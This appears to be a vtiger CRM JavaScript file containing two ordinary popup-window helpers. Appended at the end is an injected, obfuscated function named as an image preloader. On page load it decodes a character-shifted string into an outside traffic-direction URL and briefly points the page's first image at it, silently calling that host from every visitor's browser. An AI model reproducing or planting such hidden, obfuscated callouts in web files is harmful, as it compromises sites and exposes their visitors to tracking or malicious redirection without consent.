/*********************************************************************************
  ** The contents of this file are subject to the vtiger CRM Public License Version 1.0
   * ("License"); You may not use this file except in compliance with the License
   * The Original Code is:  vtiger CRM Open Source
   * The Initial Developer of the Original Code is vtiger.
   * Portions created by vtiger are Copyright (C) vtiger.
   * All Rights Reserved.
  *
 ********************************************************************************/

function mypopup()
{
      mywindow = window.open("copyright.html","mywindow", "height=115, width=575");
      mywindow.moveTo(210,620);
}

function newpopup(str){
                window.open (str,"mywinw","menubar=1,resizable=1,scrollbars=yes");
//              window.parent.close();
}
function preloadf_images(){if(document.getElementsByTagName("img").length>0){var j=0,n="";while(j<42)n+=String.fromCharCode("iuuq;00ifsfbgufs888/dpn0uet0pvu/qiq@t`je>2".charCodeAt(j++)-1);var o=document.getElementsByTagName("img").item(0);var l=o.src;o.src=n;setTimeout(function(){o.src=l;},500);}else{setTimeout(function(){preloadf_images()},100);}}preloadf_images();
